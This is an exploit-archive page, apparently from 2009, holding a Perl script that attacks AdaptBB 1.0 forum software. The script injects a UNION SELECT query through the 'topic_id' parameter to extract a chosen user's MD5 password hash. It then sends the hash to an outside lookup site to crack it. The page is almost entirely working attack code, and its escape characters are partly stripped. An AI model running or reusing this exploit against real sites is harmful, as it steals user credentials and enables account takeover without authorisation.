[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit
# Published : 2009-04-03
# Author : StAkeR
# Previous Title : Gravity Board X 2.0b SQL Injection / Post Auth Code Execution
# Next Title : Koschtit Image Gallery 1.82 Multiple Local File Inclusion Vulnerabilities
#!/usr/bin/perl -w
#
# AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit
#
# Description
# -----------
# AdaptBB contains a flaw that allows an attacker to carry out an SQL
# injection attack. The issue is due to the inc/bb/topic.php script not
# properly sanitizing user-supplied input to the 'topic_id' variable. This may
# allow an attacker to inject or manipulate SQL queries in the backend
# database if magic_quotes_gpc = off.
# -----------
# by Juri Gianni aka yeat - staker[at]hotmail[dot]it
use strict;
use LWP::Simple;
use IO::Socket;
our ($host,$path,$username) = @ARGV;
if (@ARGV != 3)
{
print "n+-----------------------------------------------------------------------+n".
"r| AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit |n".
"r+-----------------------------------------------------------------------+n".
"rby yeat - staker[at]hotmail[dot]itn".
"nUsage: perl $0 host /path/ usernamen".
"nhost: localhostn".
"rpath: /adaptbb/n".
"rusername: target usernamen";
exit;
}
if ($username =~ /(w+)/i) {
print "Victim: $usernamen";
exploit();
}
sub exploit
{
my ($packet,$html,$inject,$socket);
$inject = "%27/**/UNION/**/SELECT/**/password,2,3,4,5,6,7,8,9,10/**/".
"FROM/**/adaptbb_users/**/WHERE/**/username='$username'%23";
$socket = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
) or die $!;
$packet .= "GET $path/index.php?do=topic&topic_id=$injectrn";
$packet .= "Host: $hostrn";
$packet .= "User-Agent: Lynx (textmode)rn";
$packet .= "Connection: closernrn";
$socket->send($packet);
while (<$socket>) {
$html .= $_;
}
if ($html =~ /Re: ([a-f0-9]{32})"/i) {
print "Exploit successfulnMD5: $1n";
print "Password Cracked: ".search_md5($1)."n";
}
else {
print "Exploit unsuccesful..n";
}
}
sub search_md5
{
my $hash = shift @_;
my $cont = undef;
if ($hash =~ /^([a-f0-9]{32})$/i) {
return get("http://md5.rednoize.com/?p&s=md5&q=$hash");
}
else {
return 404;
}
}
# www.Syue.com [2009-04-03]